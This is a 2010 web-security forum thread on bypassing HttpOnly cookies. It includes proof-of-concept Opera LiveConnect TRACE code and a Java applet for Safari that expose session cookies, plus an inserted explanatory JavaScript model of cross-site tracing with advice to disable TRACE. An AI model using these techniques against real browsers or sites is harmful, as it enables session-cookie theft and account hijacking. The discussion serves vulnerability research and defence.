Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
How to bypass HttpOnly?
Posted by: the_master
Date: January 14, 2010 09:56AM

Hi all,

I have a question.

How do you bypass HttpOnly? I think by Cross Site Tracing, but
I'm not confident.

Thanks

Re: How to bypass HttpOnly?
Posted by: p0deje
Date: January 14, 2010 10:07AM

Cross-site tracing uses TRACE, which will only work in IE6, so don't bother with it.
It's better to use AJAX with getAllResponseHeaders(), but again it will not work in all browsers.

Look here: http://www.webappsec.org/lists/websecurity/archive/2006-05/msg00025.html
(first result in Google)

---------
http://p0deje.blogspot.com



Edited 2 time(s). Last edit at 01/14/2010 10:10AM by p0deje.

Re: How to bypass HttpOnly?
Posted by: p0deje
Date: January 14, 2010 10:11AM

And look at http://ha.ckers.org/blog/20070719/firefox-implements-httponly-and-is-vulnerable-to-xmlhttprequest/

---------
http://p0deje.blogspot.com

Re: How to bypass HttpOnly?
Posted by: LeverOne
Date: February 13, 2010 06:57AM

Well, I found ways to get cookies with "httpOnly" in Opera & Safari using Java. I can recommend my applet ([code.google.com]) and this article ([forum.antichat.ru], in Russian, 7 months ago).

The essence of the methods:

1. Opera:

<?php
// Set a cookie that script is not supposed to be able to read.
header("Set-Cookie: hidden=value; httpOnly");
?>

<script>

// document.cookie does not show the HttpOnly cookie.
alert("Cookie: "+document.cookie);

// LiveConnect: call the Java plugin's java.net.URL from JavaScript. The plugin
// shares the browser's cookie jar, so its request carries the HttpOnly cookie,
// and a TRACE reflects that request, Cookie header included, in the response body.
function javacon(url)
{
 var javaurl = new java.net.URL(url);
 var conn = javaurl.openConnection();
 conn.setRequestMethod('TRACE');
 var response = '';
 var input = conn.getInputStream();
 var lnr = new java.io.LineNumberReader(new java.io.InputStreamReader(input));
 var n;
 while ((n = lnr.readLine()) != null) response += n + '\n ';
 return response;
}

// Shows the reflected request, HttpOnly cookie included.
alert(javacon(location.href+'.txt'));

</script>

2. Safari:

RequestProperty.java
import java.applet.*;
import java.net.*;
import java.io.*;

// Applet that reads back the Cookie header the Java plugin attached to its own
// request. The plugin fills that header from the browser's cookie jar, HttpOnly
// cookies included, and getRequestProperty() hands it to the applet.
public class RequestProperty extends Applet
{
 public void start()
 {
  try {
       URL url = getCodeBase();
       HttpURLConnection conn = (HttpURLConnection) url.openConnection();
       try {
            conn.getInputStream();    // plain GET; the Cookie header is set when the connection opens
           }
       catch (IOException ee)
           {
            conn.getErrorStream();    // a non-2xx status still leaves the request headers in place
           }
       String cookie = conn.getRequestProperty("Cookie");
       // Hand the value back to the page through a javascript: URL.
       getAppletContext().showDocument(new URL("javascript:alert('"+cookie+"');"));
      }
  catch (Exception e){}   // proof of concept: errors are ignored
 }
}

<applet code=RequestProperty.class width=1 height=1></applet>

LeverOne

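The mechanics behind p0deje's answer (TRACE reflection and getAllResponseHeaders()) and LeverOne's Opera technique (the same TRACE reflection reached through the Java plugin's connection) come down to one fact: HttpOnly removes cookies from script-facing APIs such as document.cookie, not from the request on the wire, so any channel that reflects the raw request leaks them. The block below is an added example written for this page, not code from the thread or from either poster; the cookie jar, cookie values and host name are constructed, and serveTrace() and getAllResponseHeaders() are models standing in for a web server and a browser respectively.

```javascript
// Added example, not code from the thread. A minimal model of why HttpOnly
// hides cookies only from script-facing APIs, and how cross-site tracing
// recovers the raw Cookie header. Cookie names, values and the host name are
// constructed for the example; serveTrace() and getAllResponseHeaders() stand
// in for a server and a browser respectively.

// Constructed cookie jar for one origin: name -> { value, httpOnly }.
const COOKIE_JAR = {
  SESSIONID: { value: "a1b2c3", httpOnly: true },
  theme: { value: "dark", httpOnly: false },
};

// What script sees through document.cookie: HttpOnly cookies are filtered out.
function documentCookie(jar) {
  return Object.entries(jar)
    .filter(([, c]) => !c.httpOnly)
    .map(([name, c]) => `${name}=${c.value}`)
    .join("; ");
}

// What goes on the wire: the browser, or a plugin that shares its cookie jar,
// sends every cookie for the origin, HttpOnly or not.
function cookieHeader(jar) {
  return Object.entries(jar)
    .map(([name, c]) => `${name}=${c.value}`)
    .join("; ");
}

// Raw HTTP/1.1 request as the browser would emit it.
function buildRequest(method, path, host, jar) {
  return `${method} ${path} HTTP/1.1\r\nHost: ${host}\r\n` +
    `Cookie: ${cookieHeader(jar)}\r\n\r\n`;
}

// Server side of TRACE (RFC 7231 section 4.3.8): the request is reflected in
// the body as message/http. With TRACE enabled the reflected body hands the
// attacker the Cookie header; a hardened server answers 405 and reflects nothing.
function serveTrace(rawRequest, traceEnabled) {
  if (!traceEnabled) {
    return "HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n" +
      "Content-Length: 0\r\n\r\n";
  }
  return "HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n" +
    `Content-Length: ${Buffer.byteLength(rawRequest)}\r\n\r\n` + rawRequest;
}

// Attacker side: take the reflected request out of a TRACE response and
// return its Cookie header, or null when nothing was reflected.
function cookiesFromTraceEcho(rawResponse) {
  const headerEnd = rawResponse.indexOf("\r\n\r\n");
  if (headerEnd < 0) return null;
  const statusLine = rawResponse.slice(0, rawResponse.indexOf("\r\n"));
  if (!/^HTTP\/1\.[01] 200 /.test(statusLine)) return null;
  const reflected = rawResponse.slice(headerEnd + 4);
  const m = reflected.match(/^Cookie:[ \t]*(.*)$/im);
  return m ? m[1] : null;
}

// The second channel p0deje names: XMLHttpRequest.getAllResponseHeaders().
// The Firefox bug he links returned Set-Cookie through it. The XHR spec now
// forbids exposing Set-Cookie and Set-Cookie2; that filter is modelled here.
const FORBIDDEN_RESPONSE_HEADERS = new Set(["set-cookie", "set-cookie2"]);

function getAllResponseHeaders(rawHeaders) {
  return rawHeaders
    .split(/\r?\n/)
    .filter((line) => line.includes(":"))
    .filter((line) => {
      const name = line.slice(0, line.indexOf(":")).trim().toLowerCase();
      return !FORBIDDEN_RESPONSE_HEADERS.has(name);
    })
    .join("\r\n");
}

// Walk through the three views of the same cookie jar.
const request = buildRequest("TRACE", "/", "victim.example", COOKIE_JAR);
console.log("document.cookie :", documentCookie(COOKIE_JAR));
console.log("TRACE enabled   :", cookiesFromTraceEcho(serveTrace(request, true)));
console.log("TRACE disabled  :", cookiesFromTraceEcho(serveTrace(request, false)));
```

The practitioner's check that follows from this is on the server, not in the cookie flag: send a TRACE to the application and expect a 405 (Apache's `TraceEnable off`); anything that reflects the request body, including the Java-plugin path LeverOne describes, turns every HttpOnly cookie into a readable string.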
Re: How to bypass HttpOnly?
Posted by: sirdarckcat
Date: February 13, 2010 07:52AM

Those don't get the cookie the user has now, right? It returns a new one.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: How to bypass HttpOnly?
Posted by: LeverOne
Date: February 13, 2010 09:05AM

No, these methods can get cookies with "HttpOnly" which the user has now (the Set-Cookie is just an example).

Quote
sdc: then, the opera one is a cross site tracing vuln

It's obvious! hahaha

Fixed in Opera 10.50!!!



Edited 2 time(s). Last edit at 03/03/2010 01:26PM by LeverOne.

Re: How to bypass HttpOnly?
Posted by: sirdarckcat
Date: February 13, 2010 01:47PM

Then the Opera one is a cross-site tracing vuln.. =/

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: How to bypass HttpOnly?
Posted by: rvdh
Date: February 16, 2010 09:15PM

Very nice find, LeverOne! Another reason to zap JS LiveConnect from browsers altogether.

Re: How to bypass HttpOnly?
Posted by: sirdarckcat
Date: February 17, 2010 08:25AM

lol, opera.fail()

new Packages.asdf.asdf.asdf();

makes a request for

/asdf/asdf/asdf.class

haha.. and this:

javascript:alert(new Packages["//sirdarckcat.asdf.asdf"].asdf())

loads

eaea.sirdarckcat.net/asdf/asdf/asdf.class

gotta love opera xDDD

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 02/17/2010 08:25AM by sirdarckcat.
